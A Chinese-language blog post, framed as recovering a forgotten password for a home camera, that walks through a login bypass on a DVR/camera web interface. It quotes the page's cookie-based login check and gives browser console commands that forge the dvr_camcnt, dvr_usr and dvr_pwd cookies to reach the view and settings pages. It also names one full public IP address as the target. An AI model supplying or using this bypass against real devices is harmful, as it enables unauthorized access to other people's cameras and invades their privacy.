家里摄像头密码忘记找回

密码忘记找回

 

  在生活中，摄像头随处可见。他们应用在很多方面。已经成了我们必备的工具。那他们可能有存在漏洞。

今天我对我的忘记密码家庭摄像头将进行找回

 

 

 开始！

第一步:确定目标

我家的摄像头  88.248.xx.xx:80

第二步:进行登录

我忘了密码

 好，我想登录摄像头。但不知道密码是多少，先来看看

摄像头的js脚本

    我对之前用默认密码成功登录的页面进行抓包，找到处理页面登录逻辑的js，对处理页面登录的逻辑分析发现，存在登录绕过漏洞，代码如下：
$(document).ready(function(){
         dvr_camcnt= Cookies.get("dvr_camcnt");
         iSetAble= Cookies.get("iSetAble");
         iPlayBack= Cookies.get("iPlayBack");
         dvr_usr= Cookies.get("dvr_usr");
         dvr_pwd= Cookies.get("dvr_pwd");
         if(iSetAble== '0'){
                 $('#pb_settings').css('display','none');
                 }
         if(iPlayBack== '0'){
                 $('#pb_review').css('display','none');
                 }
         if(dvr_camcnt== null || dvr_usr == null || dvr_pwd == null)
         {
                 location.href= "/index.html";
         }

 

  摄像头管理页面直接通过indexjs检查cookie是否为空来判断用户是否登录。这样来写登录状态判断很危险
   所以，通过伪造cookie便可以绕过登录页。通过代码可以看到需要伪造三个cookie值，dvr_camcnt，dvr_usr=admin，dvr_pwd=123。直接打开http://88.248.56.88:80/view2.html时，抓包发现会自动提交cookie的值。dvr_usr和dvr_pwd随便设置。保存后，重新刷新一下，便可以成功登录系统。

dvr_camcnt是频道为偶数就好

 

第三步:开始找回

这里用伪造cookie工具edit+cookie可以

不过用console指令更好

打开浏览器开发者工具，console控制台

输入以下，如图

 

document.cookie="dvr_camcnt=4"; document.cookie="dvr_usr=admin"; document.cookie="dvr_pwd=123";

 

 

输入

 

回车

 

若出现回显dvr_pwd=123。恭喜，成功

然后在地址栏输入http://88.248.xx.xx:80/view2.html

 然后到设置里改回，成功

欢迎大佬在评论区赐教

请给予我支持，\(^o^)/关注一下吧！！！